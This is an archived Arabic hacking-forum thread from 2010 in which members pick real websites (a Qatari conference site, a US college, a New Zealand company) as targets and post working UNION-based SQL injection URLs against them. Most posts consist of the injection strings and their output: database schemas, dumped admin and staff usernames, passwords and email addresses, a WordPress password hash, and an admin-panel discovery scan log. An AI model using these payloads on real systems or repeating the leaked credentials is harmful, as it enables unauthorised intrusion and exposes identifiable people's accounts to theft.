:: vBspiders Professional Network ::
صفحة 10 من 11 « الأولى 89 10 11
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/showthread.php?t=33334)

Master vbspiders 08-12-2010 01:19 AM
[align=center]الهدف الجديد هو موقع وزارة الخارجية لدولة قطر
الهدف فقط للتدريب لا اكثر
الرابط :
كود PHP:
http://www.qatar-conferences.org/arab/newsdetail.php?id=3 
الموقع تم حقنو يدوي وتم استخراج كامل المعلومات مسبقأ
بالتوفيق
تحياتي

[/align]

Master vbspiders 08-12-2010 01:25 AM
[align=center]تصحيح بسيط..
الهدف السابق هو لادارة الموتمرات الخاصة بدولة قطر
تحياتي[/align]

NeTCaT-Ma 08-12-2010 02:00 AM
سلام عليكم هدا ما استطعت أن أطلعه
عدد الأعمدة المصابة 1.2.3.4.5
الأعمدة المصابة 2.4.5
الإصدار 5
هنا توقفت في هده الحقنة تحقق منها أخي
http://www.qatar-conferences.org/ara...tail.php?id=-3 union select 1,version(),3,4,5+from+information_schema.columns--

Master vbspiders 08-12-2010 02:21 AM
[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=389%27 
بالتوفيق
تحياتي

[/align]

kanvi 08-12-2010 07:18 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة Master vbspiders (المشاركة 192690)
[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=389%27 
بالتوفيق
تحياتي

[/align]
تم حقن الهدف: الموقع بسيط

اصدر القاعدة

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12-- 
5.0.91-community

استخرج اسم القاعدة:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572-- 
كود PHP:
trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb 
الحقنة النهائية:
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user-- 
1:aoh:test2:Andy:Oh


ملاحظة بسيطة:


نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع

عبد الله ر 08-12-2010 12:42 PM
اقتباس:
الهدف الجديد هو موقع وزارة الخارجية لدولة قطر
الهدف فقط للتدريب لا اكثر
الرابط :
كود PHP:
http://www.qatar-conferences.org/arab/newsdetail.php?id=3
تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)

http://www.qatar-conferences.org/ara...115,%2037%29--

admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi


حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ara...5f6c6f67696e--

نتيجة الحقنة

admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar

لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة

حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ara...+admin_login--

يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login

معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08

لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط


يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع


الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة

Master vbspiders 08-12-2010 02:23 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة kanvi (المشاركة 192871)
تم حقن الهدف: الموقع بسيط

اصدر القاعدة

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12-- 
5.0.91-community

استخرج اسم القاعدة:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572-- 
كود PHP:
trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb 
الحقنة النهائية:
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user-- 
1:aoh:test2:Andy:Oh


ملاحظة بسيطة:


نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع
بارك الله فيك اخي الغالي حقنة رائعة
واصل وننتظر الاخ مستر تيج...
مستر تيج>>مممم اذا واجهة اي مشاكل اطرحها هنا والاخوان ما راح يقصرو معاك
تحياتي

Master vbspiders 08-12-2010 02:29 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الله ر (المشاركة 192920)
تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)

http://www.qatar-conferences.org/ara...115,%2037%29--

admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi


حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ara...5f6c6f67696e--

نتيجة الحقنة

admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar

لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة

حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ara...+admin_login--

يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login

معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08

لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط


يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع


الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة
[align=center]تسلم ايدك على الحقنة الرائعة
ياريت الاعضاء الباقين يكملوها ويقومو بوضع رابط الحقنة
بعد كل هذه المعلومات صار الموقع سهل جدا..
وبالنسبة للوحة التحكم كلامك سليم
واما بالنسبة لليوزر والباس فاعتقد شي عادي
يعني هما ما واضعين اليوزرات على سكربت ستاف او عاملينها ظاهرة للجميع
وبالاخير ما في لوحة تحكم على هذا الموقع
لانهم رابطينها على سيرفر ثاني
والله اعلم
بارك الله فيك
تحياتي[/align]

darkman.dz 08-12-2010 03:04 PM
السلام عليكم ورحمة الله تعالى وبركاته
كيف الأحوال

darkman.dz 08-12-2010 03:24 PM
كود:
http://www.mcny.edu/news/newsdetail.php?id=389
الحقنة ركبوها أنتم لتتعلمو الحقن
==========tables===================
trackrsvp_user:password:audrey_mcnydb
users:password:audrey_mcnydb
wp_posts:post_password:audrey_test
wp_users:user_pass:audrey_test
======columns of table 1================
trackrsvp_user:id:audrey_mcnydb
trackrsvp_user:username:audrey_mcnydb
trackrsvp_user:password:audrey_mcnydb
trackrsvp_user:fname:audrey_mcnydb
trackrsvp_user:lname:audrey_mcnydb
==========columns of table 2============
users:fname:audrey_mcnydb
users:lname:audrey_mcnydb
users:email:audrey_mcnydb
users:department:audrey_mcnydb
users:user_name:audrey_mcnydb
users:password:audrey_mcnydb
users:level:audrey_mcnydb
users:page:audrey_mcnydb
users:user_id:audrey_mcnydb
===================================
الأيدي و يوزر الأدمن و باسوورده
1:aoh:test2
باقي الأعضاء + رقم العضوية + الباس + اليوزر + الإيميل
1:aoh:test21:aoh:audrey:aoh@mcny.edu
2:erobles:audrey:erobles@mcny.edu
20:mmelendez:news2:MMelendez@mcny.edu
11:scockerl:spagirl:scockerl@mcny.edu
14:sservices:audrey:sts@mcny.edu
13:mfung:dechet0:afung@metropolitan.edu
15:jsantiago:audrey:jsantiago@mcny.edu
16:urban:dialogues:urbandialogues@mcny.edu
18:epena:mcnypena:epena@mcny.edu
6:slenhart:cohen:slenhart@mcny.edu
19:admissions:updates:admissions@mcny.edu

salahsaad 08-12-2010 03:27 PM
thnks

HOLACO 08-12-2010 06:54 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 193056)
كود:
http://www.mcny.edu/news/newsdetail.php?id=389
الحقنة ركبوها أنتم لتتعلمو الحقن
==========tables===================
trackrsvp_user:password:audrey_mcnydb
users:password:audrey_mcnydb
wp_posts:post_password:audrey_test
wp_users:user_pass:audrey_test
======columns of table 1================
trackrsvp_user:id:audrey_mcnydb
trackrsvp_user:username:audrey_mcnydb
trackrsvp_user:password:audrey_mcnydb
trackrsvp_user:fname:audrey_mcnydb
trackrsvp_user:lname:audrey_mcnydb
==========columns of table 2============
users:fname:audrey_mcnydb
users:lname:audrey_mcnydb
users:email:audrey_mcnydb
users:department:audrey_mcnydb
users:user_name:audrey_mcnydb
users:password:audrey_mcnydb
users:level:audrey_mcnydb
users:page:audrey_mcnydb
users:user_id:audrey_mcnydb
===================================
الأيدي و يوزر الأدمن و باسوورده
1:aoh:test2
باقي الأعضاء + رقم العضوية + الباس + اليوزر + الإيميل
1:aoh:test21:aoh:audrey:aoh@mcny.edu
2:erobles:audrey:erobles@mcny.edu
20:mmelendez:news2:MMelendez@mcny.edu
11:scockerl:spagirl:scockerl@mcny.edu
14:sservices:audrey:sts@mcny.edu
13:mfung:dechet0:afung@metropolitan.edu
15:jsantiago:audrey:jsantiago@mcny.edu
16:urban:dialogues:urbandialogues@mcny.edu
18:epena:mcnypena:epena@mcny.edu
6:slenhart:cohen:slenhart@mcny.edu
19:admissions:updates:admissions@mcny.edu

فعلا ياخى طلعت معايا نفس النتائج بس للاسف الباسوورد او اليوزر خطأ حتى مع تجربه الجدول users

وده مسار اللوحه

http://www.mcny.edu/admin

d4rK-h4ck3r 08-12-2010 07:05 PM
new target
http://www.konka.co.nz/productdetail.php?id=33
enjoy

HOLACO 08-12-2010 07:06 PM
الحقنه حقة الجدول wp_users

admin:$P$BpnUNk5EnqUFNcpcDyuuf/KnNUPaOj0

اظن هى الصحيحه

darkman.dz 08-12-2010 07:16 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة HOLACO (المشاركة 193178)
فعلا ياخى طلعت معايا نفس النتائج بس للاسف الباسوورد او اليوزر خطأ حتى مع تجربه الجدول users

وده مسار اللوحه

http://www.mcny.edu/admin
أخي العزيز
الباس و اليوزر صحيحين + المسار اللي أنت وضعتو هو مسار مزيف عاملينو أصحاب السكربتات و في هذا الموقع عملو مبرمج الموقع لإبعاد المخترقين و يمكنك التأكد من صحة كلامي

king dragons 08-12-2010 07:30 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة d4rK-h4ck3r (المشاركة 193187)


السلام عليكم


كود:
http://www.konka.co.nz/productdetail.php?id=-33+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15+from+users--

المعلومات :

user:pass
admin:admin
admin1:admin1
test1:testt


والسلام عليكم

darkman.dz 08-12-2010 07:41 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة d4rK-h4ck3r (المشاركة 193187)
أخي العزيز
موقعك فيه فلترة و أنا أكره الفلترة جدا
هههههههههههههههههههههههههههههههههههههههه
حبذا لو تقول لنا ماذا فلترت حتى لا أتعب smilies17

HOLACO 08-12-2010 07:54 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 193193)
أخي العزيز
الباس و اليوزر صحيحين + المسار اللي أنت وضعتو هو مسار مزيف عاملينو أصحاب السكربتات و في هذا الموقع عملو مبرمج الموقع لإبعاد المخترقين و يمكنك التأكد من صحة كلامي


ياخى اتفضل الموقع ليه اكتر من مسار للدخول وجرتهم كلهم وللاسف اليوزر او الباس خطأ




[+] Found -> http://www.mcny.edu/admin/

[-] Not Found <- http://www.mcny.edu/administrator/
[-] Not Found <- http://www.mcny.edu/moderator/
[-] Not Found <- http://www.mcny.edu/webadmin/
[-] Not Found <- http://www.mcny.edu/adminarea/
[-] Not Found <- http://www.mcny.edu/bb-admin/
[-] Not Found <- http://www.mcny.edu/adminLogin/
[-] Not Found <- http://www.mcny.edu/admin_area/
[-] Not Found <- http://www.mcny.edu/panel-administracion/
[-] Not Found <- http://www.mcny.edu/instadmin/
[-] Not Found <- http://www.mcny.edu/memberadmin/
[-] Not Found <- http://www.mcny.edu/administratorlogin/
[-] Not Found <- http://www.mcny.edu/adm/

[+] Found -> http://www.mcny.edu/admin/account.php


[+] Found -> http://www.mcny.edu/admin/index.php


[+] Found -> http://www.mcny.edu/admin/login.php


[+] Found -> http://www.mcny.edu/admin/admin.php


[+] Found -> http://www.mcny.edu/admin/account.php

[-] Not Found <- http://www.mcny.edu/admin_area/admin.php
[-] Not Found <- http://www.mcny.edu/admin_area/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/index.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.html

[+] Found -> http://www.mcny.edu/admin/account.html


[+] Found -> http://www.mcny.edu/admin/index.html


[+] Found -> http://www.mcny.edu/admin/login.html


[+] Found -> http://www.mcny.edu/admin/admin.html

[-] Not Found <- http://www.mcny.edu/admin_area/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.php

[+] Found -> http://www.mcny.edu/admin/home.php

[-] Not Found <- http://www.mcny.edu/admin_area/login.html
[-] Not Found <- http://www.mcny.edu/admin_area/index.html

[+] Found -> http://www.mcny.edu/admin/controlpanel.php

[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/admincp/index.asp
[-] Not Found <- http://www.mcny.edu/admincp/login.asp
[-] Not Found <- http://www.mcny.edu/admincp/index.html

[+] Found -> http://www.mcny.edu/admin/account.html

[-] Not Found <- http://www.mcny.edu/adminpanel.html
[-] Not Found <- http://www.mcny.edu/webadmin.html
[-] Not Found <- http://www.mcny.edu/webadmin/index.html
[-] Not Found <- http://www.mcny.edu/webadmin/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin/login.html

[+] Found -> http://www.mcny.edu/admin/admin_login.html

[-] Not Found <- http://www.mcny.edu/admin_login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l

[+] Found -> http://www.mcny.edu/admin/cp.php

[-] Not Found <- http://www.mcny.edu/cp.php
[-] Not Found <- http://www.mcny.edu/administrator/index.ph
[-] Not Found <- http://www.mcny.edu/administrator/login.ph
[-] Not Found <- http://www.mcny.edu/nsw/admin/login.php
[-] Not Found <- http://www.mcny.edu/webadmin/login.php

[+] Found -> http://www.mcny.edu/admin/admin_login.php

[-] Not Found <- http://www.mcny.edu/admin_login.php
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.php
[-] Not Found <- http://www.mcny.edu/admin_area/admin.html
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.php

[-] Not Found <- http://www.mcny.edu/admin-login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.html
[-] Not Found <- http://www.mcny.edu/bb-admin/login.html
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.html

[+] Found -> http://www.mcny.edu/admin/home.html

[-] Not Found <- http://www.mcny.edu/login.php
[-] Not Found <- http://www.mcny.edu/modelsearch/login.php
[-] Not Found <- http://www.mcny.edu/moderator.php
[-] Not Found <- http://www.mcny.edu/moderator/login.php
[-] Not Found <- http://www.mcny.edu/moderator/admin.php
[-] Not Found <- http://www.mcny.edu/account.php
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.html

[-] Not Found <- http://www.mcny.edu/admin-login.html
[-] Not Found <- http://www.mcny.edu/controlpanel.php
[-] Not Found <- http://www.mcny.edu/admincontrol.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/adminLogin.html

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/home.html
[-] Not Found <- http://www.mcny.edu/rcjakar/admin/login.ph
[-] Not Found <- http://www.mcny.edu/adminarea/index.html
[-] Not Found <- http://www.mcny.edu/adminarea/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin.php
[-] Not Found <- http://www.mcny.edu/webadmin/index.php
[-] Not Found <- http://www.mcny.edu/webadmin/admin.php

[+] Found -> http://www.mcny.edu/admin/controlpanel.html

[-] Not Found <- http://www.mcny.edu/admin.html

[+] Found -> http://www.mcny.edu/admin/cp.html

[-] Not Found <- http://www.mcny.edu/cp.html
[-] Not Found <- http://www.mcny.edu/adminpanel.php
[-] Not Found <- http://www.mcny.edu/moderator.html
[-] Not Found <- http://www.mcny.edu/administrator/index.ht
[-] Not Found <- http://www.mcny.edu/administrator/login.ht
[-] Not Found <- http://www.mcny.edu/user.html
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.html
[-] Not Found <- http://www.mcny.edu/login.html
[-] Not Found <- http://www.mcny.edu/modelsearch/login.html
[-] Not Found <- http://www.mcny.edu/moderator/login.html
[-] Not Found <- http://www.mcny.edu/adminarea/login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.html
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.html
[-] Not Found <- http://www.mcny.edu/admincontrol/login.htm
[-] Not Found <- http://www.mcny.edu/adm/index.html
[-] Not Found <- http://www.mcny.edu/adm.html
[-] Not Found <- http://www.mcny.edu/moderator/admin.html
[-] Not Found <- http://www.mcny.edu/user.php
[-] Not Found <- http://www.mcny.edu/account.html
[-] Not Found <- http://www.mcny.edu/controlpanel.html
[-] Not Found <- http://www.mcny.edu/admincontrol.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l
[-] Not Found <- http://www.mcny.edu/wp-login.php
[-] Not Found <- http://www.mcny.edu/adminLogin.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.php

[-] Not Found <- http://www.mcny.edu/home.php
[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/index.php
[-] Not Found <- http://www.mcny.edu/adminarea/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/login.php
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.php
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.php
[-] Not Found <- http://www.mcny.edu/admincontrol/login.php
[-] Not Found <- http://www.mcny.edu/adm/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admin2.php
[-] Not Found <- http://www.mcny.edu/admin2/login.php
[-] Not Found <- http://www.mcny.edu/admin2/index.php
[-] Not Found <- http://www.mcny.edu/adm/index.php
[-] Not Found <- http://www.mcny.edu/adm.php
[-] Not Found <- http://www.mcny.edu/affiliate.php
[-] Not Found <- http://www.mcny.edu/adm_auth.php
[-] Not Found <- http://www.mcny.edu/memberadmin.php
[-] Not Found <- http://www.mcny.edu/administratorlogin.php

d4rK-h4ck3r 08-12-2010 07:57 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة king dragons (المشاركة 193195)




السلام عليكم


كود:
http://www.konka.co.nz/productdetail.php?id=-33+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15+from+users--
المعلومات :

user:pass
admin:admin
admin1:admin1
test1:testt


والسلام عليكم
perfect no more :Great:

darkman.dz 08-12-2010 11:41 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة HOLACO (المشاركة 193204)
ياخى اتفضل الموقع ليه اكتر من مسار للدخول وجرتهم كلهم وللاسف اليوزر او الباس خطأ




[+] Found -> http://www.mcny.edu/admin/

[-] Not Found <- http://www.mcny.edu/administrator/
[-] Not Found <- http://www.mcny.edu/moderator/
[-] Not Found <- http://www.mcny.edu/webadmin/
[-] Not Found <- http://www.mcny.edu/adminarea/
[-] Not Found <- http://www.mcny.edu/bb-admin/
[-] Not Found <- http://www.mcny.edu/adminLogin/
[-] Not Found <- http://www.mcny.edu/admin_area/
[-] Not Found <- http://www.mcny.edu/panel-administracion/
[-] Not Found <- http://www.mcny.edu/instadmin/
[-] Not Found <- http://www.mcny.edu/memberadmin/
[-] Not Found <- http://www.mcny.edu/administratorlogin/
[-] Not Found <- http://www.mcny.edu/adm/

[+] Found -> http://www.mcny.edu/admin/account.php


[+] Found -> http://www.mcny.edu/admin/index.php


[+] Found -> http://www.mcny.edu/admin/login.php


[+] Found -> http://www.mcny.edu/admin/admin.php


[+] Found -> http://www.mcny.edu/admin/account.php

[-] Not Found <- http://www.mcny.edu/admin_area/admin.php
[-] Not Found <- http://www.mcny.edu/admin_area/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/index.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.html

[+] Found -> http://www.mcny.edu/admin/account.html


[+] Found -> http://www.mcny.edu/admin/index.html


[+] Found -> http://www.mcny.edu/admin/login.html


[+] Found -> http://www.mcny.edu/admin/admin.html

[-] Not Found <- http://www.mcny.edu/admin_area/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.php

[+] Found -> http://www.mcny.edu/admin/home.php

[-] Not Found <- http://www.mcny.edu/admin_area/login.html
[-] Not Found <- http://www.mcny.edu/admin_area/index.html

[+] Found -> http://www.mcny.edu/admin/controlpanel.php

[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/admincp/index.asp
[-] Not Found <- http://www.mcny.edu/admincp/login.asp
[-] Not Found <- http://www.mcny.edu/admincp/index.html

[+] Found -> http://www.mcny.edu/admin/account.html

[-] Not Found <- http://www.mcny.edu/adminpanel.html
[-] Not Found <- http://www.mcny.edu/webadmin.html
[-] Not Found <- http://www.mcny.edu/webadmin/index.html
[-] Not Found <- http://www.mcny.edu/webadmin/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin/login.html

[+] Found -> http://www.mcny.edu/admin/admin_login.html

[-] Not Found <- http://www.mcny.edu/admin_login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l

[+] Found -> http://www.mcny.edu/admin/cp.php

[-] Not Found <- http://www.mcny.edu/cp.php
[-] Not Found <- http://www.mcny.edu/administrator/index.ph
[-] Not Found <- http://www.mcny.edu/administrator/login.ph
[-] Not Found <- http://www.mcny.edu/nsw/admin/login.php
[-] Not Found <- http://www.mcny.edu/webadmin/login.php

[+] Found -> http://www.mcny.edu/admin/admin_login.php

[-] Not Found <- http://www.mcny.edu/admin_login.php
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.php
[-] Not Found <- http://www.mcny.edu/admin_area/admin.html
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.php

[-] Not Found <- http://www.mcny.edu/admin-login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.html
[-] Not Found <- http://www.mcny.edu/bb-admin/login.html
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.html

[+] Found -> http://www.mcny.edu/admin/home.html

[-] Not Found <- http://www.mcny.edu/login.php
[-] Not Found <- http://www.mcny.edu/modelsearch/login.php
[-] Not Found <- http://www.mcny.edu/moderator.php
[-] Not Found <- http://www.mcny.edu/moderator/login.php
[-] Not Found <- http://www.mcny.edu/moderator/admin.php
[-] Not Found <- http://www.mcny.edu/account.php
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.html

[-] Not Found <- http://www.mcny.edu/admin-login.html
[-] Not Found <- http://www.mcny.edu/controlpanel.php
[-] Not Found <- http://www.mcny.edu/admincontrol.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/adminLogin.html

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/home.html
[-] Not Found <- http://www.mcny.edu/rcjakar/admin/login.ph
[-] Not Found <- http://www.mcny.edu/adminarea/index.html
[-] Not Found <- http://www.mcny.edu/adminarea/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin.php
[-] Not Found <- http://www.mcny.edu/webadmin/index.php
[-] Not Found <- http://www.mcny.edu/webadmin/admin.php

[+] Found -> http://www.mcny.edu/admin/controlpanel.html

[-] Not Found <- http://www.mcny.edu/admin.html

[+] Found -> http://www.mcny.edu/admin/cp.html

[-] Not Found <- http://www.mcny.edu/cp.html
[-] Not Found <- http://www.mcny.edu/adminpanel.php
[-] Not Found <- http://www.mcny.edu/moderator.html
[-] Not Found <- http://www.mcny.edu/administrator/index.ht
[-] Not Found <- http://www.mcny.edu/administrator/login.ht
[-] Not Found <- http://www.mcny.edu/user.html
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.html
[-] Not Found <- http://www.mcny.edu/login.html
[-] Not Found <- http://www.mcny.edu/modelsearch/login.html
